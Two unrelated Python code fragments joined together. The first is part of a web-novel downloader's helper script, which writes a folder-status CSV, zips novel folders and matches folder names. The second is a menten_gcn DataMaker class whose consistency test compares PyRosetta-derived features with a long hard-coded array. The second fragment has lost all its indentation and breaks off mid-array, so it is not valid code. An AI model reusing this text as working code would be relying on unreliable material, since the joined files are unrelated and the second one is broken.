        print("dir= " + dir)
        #dir='./novel_list/'+code+' '+name
        # Start from chapter 0 so the whole novel is fetched.
        novel.setDir(dir)
        novel.setLastChapter(0)
        novel.processNovel()
# register as csv every folder name and the number of chapter
def getFolderStatus():
    """Write ./novel_list/status.csv with one [code, last_chapter, name]
    row per novel folder found under ./novel_list."""
    dir = './novel_list'
    statusList = []
    for novel_folder in os.listdir(dir):
        # Folder names are "<code> <title>"; skip entries without a space
        # (e.g. status.csv itself).
        code = novel_folder.find(' ')
        if code == -1:
            print(code)
            continue
        novel_name = novel_folder[code:]
        code = novel_folder[:code]
        # Highest chapter number stored (files are named "<number>_<...>").
        lastchap = 0
        for file in os.listdir(dir + '/' + novel_folder):
            chapnum = file.find('_')
            chapnum = int(file[:chapnum])
            if(chapnum > lastchap):
                lastchap = chapnum
        statusList.append([code, lastchap, novel_name])
        print('%s %s %s' % (code, lastchap, novel_name))
    enterInCSV(dir + '/status.csv', statusList)
# overwrite the file with tab content
def enterInCSV(filename, tab):
    """Overwrite *filename* with one space-separated row per entry of *tab*.

    Each entry must provide at least three elements; rows are rendered with
    the same ``'%1s %1s %2s'`` layout the rest of the tooling reads back.
    """
    rows = ['%1s %1s %2s\n' % (entry[0], entry[1], entry[2]) for entry in tab]
    with open(filename, 'w+', encoding='utf-8') as out:
        out.writelines(rows)
def compressNovelDirectory(novelDirectory, outputDir):
    """Zip the whole *novelDirectory* tree into ``<outputDir>/<name>.zip``."""
    import zipfile
    # The archive is named after the last path component of the novel folder.
    novel_name = novelDirectory[novelDirectory.rfind('/') + 1:]
    archive_path = outputDir + '/' + novel_name + '.zip'
    with zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) as archive:
        for root, _dirs, files in os.walk(novelDirectory):
            for entry in files:
                archive.write(os.path.join(root, entry))
                print()
# compress in zip format every novel folder found
def compressAll(regex='', outputDir=''):
    """Zip every matching novel folder under ./novel_list.

    NOTE(review): despite its name, ``regex`` is matched with ``str.find``,
    i.e. as a plain substring — not as a regular expression.  The empty
    default therefore matches every folder.
    :return: the list of folder names selected for compression
    """
    if (outputDir == ''):
        # Default output: a ./zip folder, created on first use.
        dirlist = os.listdir('./')
        print(dirlist)
        outputDir = './zip'
        if 'zip' not in dirlist:
            os.mkdir('zip')
    dir = './novel_list'
    DirToCompress = []
    for novel_folder in os.listdir(dir):
        if novel_folder.find(regex) != -1:
            DirToCompress.append(novel_folder)
    for subdir in DirToCompress:
        print('done at ' + str(DirToCompress.index(subdir)) + ' on ' + str(len(DirToCompress)))
        # Entries containing a '.' are files (e.g. status.csv), not folders.
        if(subdir.find('.') == -1):
            compressNovelDirectory(dir + '/' + subdir, outputDir)
    return(DirToCompress)
# find in the novels folder every regex match
def findNovel(regex, dir='./novel_list'):
    """Return the entries of *dir* whose name matches *regex* at the start
    (``re.match`` anchors at the beginning of the name)."""
    import re
    pattern = re.compile(regex)
    return [name for name in os.listdir(dir) if pattern.match(name)]
|
from menten_gcn import DataMaker
import menten_gcn.decorators as decs
import numpy as np
class Maguire_Grattarola_2021(DataMaker):
def __init__(self):
decorators = [decs.Sequence(), decs.CACA_dist(), decs.PhiPsiRadians(),
decs.ChiAngleDecorator(), decs.trRosettaEdges(),
decs.SequenceSeparation(), decs.RosettaJumpDecorator(rottype="euler"),
decs.RosettaHBondDecorator(),
decs.AbbreviatedRef2015Decorator_v0()]
DataMaker.__init__(self, decorators=decorators,
edge_distance_cutoff_A=15.0,
max_residues=30,
exclude_bbdec=False,
nbr_distance_cutoff_A=100,
dtype=np.float32)
def run_consistency_check(self):
N, F, S = self.get_N_F_S()
print(N, F, S)
assert N == 30
assert F == 46
assert S == 28
try:
from pyrosetta import pose_from_sequence
from menten_gcn import RosettaPoseWrapper
pose = pose_from_sequence("MENTENAI")
wrapped_pose = RosettaPoseWrapper(pose)
X, A, E, meta = self.generate_input_for_resid(wrapped_pose, 1)
def test(A, B):
np.testing.assert_array_equal(A, B, 3)
'''
import sys
np.set_printoptions(threshold=sys.maxsize)
print( repr( X ) )
print( repr( A ) )
print( repr( E ) )
print( repr( meta ) )
'''
test(meta, [1, 2, 3, 4, 5, 6, 7, 8])
expected_X = np.array([[1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 1.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 8.3775802e-07,
1.0000000e+00, 5.2359877e-07, 1.0000000e+00, -5.7595867e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.8672367e+03, 9.1478378e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.2645603e+01, 0.0000000e+00, 0.0000000e+00,
1.6573499e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.2689281e-07,
1.0000000e+00, -5.2359876e-08, 1.0000000e+00, -1.3962634e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 5.3682019e+02, 2.2368712e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.9272125e+01, 1.9425745e+00, 0.0000000e+00,
-2.7245300e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 6.6141240e-16,
1.0000000e+00, -1.2602073e-15, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.0468760e+01, 3.8885200e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 2.6608192e+01, 6.7491651e-01, 0.0000000e+00,
-1.3402600e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 1.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -1.3439035e-06,
1.0000000e+00, 5.9341193e-07, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.5641568e+00, 4.0509410e-02,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 5.9773567e+01, 1.7684269e+00, 0.0000000e+00,
1.1517500e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.2689281e-07,
1.0000000e+00, -5.2359876e-08, 1.0000000e+00, -1.3962634e-07,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 5.3682019e+02, 2.2368712e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.9272125e+01, 1.9425745e+00, 0.0000000e+00,
-2.7245300e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, -2.7057779e-16,
1.0000000e+00, 3.2313005e-16, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 1.0468760e+01, 3.8885200e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 3.4736256e+01, 6.7491651e-01, 0.0000000e+00,
-1.3402600e+00, 0.0000000e+00],
[0.0000000e+00, 1.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.5678021e-01, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
2.6757073e-01, 0.0000000e+00, 7.2029513e-01, 0.0000000e+00,
1.3246800e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
1.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 3.1415927e+00, 3.1415927e+00, 1.9198622e-07,
1.0000000e+00, 1.1344640e-06, 1.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 2.9560727e+02, 3.5983735e-01,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 6.2573467e+01, 0.0000000e+00, 0.0000000e+00,
2.3037400e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
